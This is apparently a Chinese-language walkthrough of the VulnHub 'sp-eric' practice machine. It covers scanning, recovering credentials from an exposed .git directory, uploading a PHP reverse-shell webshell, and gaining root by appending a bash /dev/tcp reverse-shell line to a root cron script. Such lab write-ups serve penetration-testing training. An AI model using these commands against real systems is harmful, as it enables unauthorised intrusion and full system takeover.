信息收集:
靶机地址:https://www.vulnhub.com/entry/sp-eric,274/
(1)ip扫描
nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:3B:68:92'
(2)端口扫描
nmap -p- -A 192.168.254.152
(3)dirb 扫描目录,.git 源码,admin.php文件,upload目录等目录扫描
dirb http://192.168.254.152
(4)访问80端口,没有发现
(5)拼接访问 admin.php ,一个登录框,尝试sql注入,弱口令等,没有结果
(6)看看 .git ,使用 githack 下载源码
python2 GitHack.py -u http://192.168.254.152/.git/
(7)查看下载的源码,发现账号密码
(8)登录 admin 页面
getshell:
(1)存在文件上传,kali 生成反弹 shell
locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
(2)修改 IP 和端口后上传,上传后没有什么回显
(3)kali 开启监听,虽然没有回显,但是访问 /upload/php-reverse-shell.php,成功反弹 shell
提权:
(1)使用 python 提升交互性,发现没有python
python -c "import pty;pty.spawn('/bin/bash')"
(2)看一下有无 python3
which python3
(3)有 python3,那么用 python3 执行
python3 -c 'import pty;pty.spawn("/bin/bash")'
(4)在 /home/eric 下发现了 backup.sh,backup.zip,flag.txt 这三个文件,查看 flag.txt,查看 backup.sh
(5)可能是计划任务,看一眼
cat /etc/crontab
(6)看了一下,backup.sh 拥有 root 权限,且我们可写可执行
(7)写入反弹 shell 的语句
echo 'bash -i >& /dev/tcp/192.168.254.129/9999 0>&1' >> backup.sh
(8)kali 开启监听
nc -lvnp 9999
(9)成功反弹 shell ,提权成功,是存在计划任务的
(10)最后在 /root 下发现一个 flag.txt